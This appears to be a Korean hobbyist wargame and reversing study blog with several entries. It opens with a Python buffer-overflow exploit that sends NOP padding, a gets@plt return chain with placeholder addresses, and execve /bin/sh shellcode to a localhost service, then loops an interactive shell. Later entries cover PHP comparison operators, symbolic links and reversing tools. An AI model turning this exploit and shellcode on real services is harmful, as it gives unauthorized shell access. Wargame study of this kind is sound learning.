// 심심해서 풀어본 리버싱. 사실 첨 풀어보는데 생각보다 쉬운듯.

from socket import *

import struct

p = lambda x:struct.pack("<L",x)

HOST = "127.0.0.1"

PORT = 8080

gets_plt = 0xffffffff

bss = 0xffffffff

payload ="\x90"*68

payload+=p(gets_plt)

payload+=p(bss)

payload+=p(bss)

s = socket(AF_INET,SOCK_STREAM)

s.connect((HOST,PORT))

s.send(payload +"\n")

s.send("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\n")

while True :

cmd=raw_input("$")

s.send(cmd+"\n")

print s.recv(1024)

s.close()

php 비교연산자 이다.

wargame 풀다 php 연산자 관련해서 문제푸는게 예전에 나왔는데 생각나는 김에 작성하는 일지

정리하자면 녹색의 True 는 대부분이 참인 값

노란색은 반반인가??

빨간색은 아마 에러에 가까운거 같다.

나도 정확히 다 알고있는게 아니라 문제 풀면서도 느끼지만 php 공부하고 python 공부해야겠다고 생각이 든다.

FC3 정복이 머지않았따.

hack-me 재밌어서 몇몇 문제 풀었는데 막혀부러띠;;

오늘의 수확량 5문제/787등

// 사실상 로우바둑좌;

write up 쓸 준비를 해야겠다.

// 기초 복습중

학교 친구 개놈이 narnia3 에서 막혔다고 한다. 그러면서 알려준 심볼릭 링크 인데 어느정도 중요하다 생각이 든다.

그래서 간단히 써본 심볼릭 링크 란??

$In -s [existing file/dir name: 저는] [new file/dir name: 뉴비입니다]

$In -s 기존에 있는 파일 또는 디렉토리_새로 만들 링크의 이름

// -s 심볼릭 링크를 만든다?? 라는 의미

이미 존재하는 (저는)라는 파일 또는 디렉터리를 (뉴비입니다) 라는 이름을 통해 접근을 해주는 것.

Reversing ??

리버싱이란 흔히 역공학 이라고 불리우는 시스템 해킹이라는 큰 포괄적 의미중 하나이다.

리버스(Reverse)와 엔지니어링(Engineering)의 합성어로 이미 완성된 프로그램을 분석을 하여 취약점을 찾아내는 행위이다.  

// 리버싱에 대해 정확이 무엇을 공부하고 어떤 것을 배워야 되는지 서술하진 않을 예정.

// 관련 워게임에 대해 문제풀이도 할 것이며 추후 공개적으로 어셈블리에 대해 공부한 내용을 서술할 계획이다.

// 물론 모두 희망사항. 

Reversing Tools !

국민 리버싱툴 

올리디버그(ollydbg)

GUI 리버싱툴

아이다(IDA)

// 여담으로 이번 코드게이트 2016 컨퍼런스에서 아이다를 기반으로 한 리버싱툴을 공개한 바가 있다.

// 역시 갓너블.kr 짝짝짝 

갓갓갓;

치트엔진(Cheat Engine)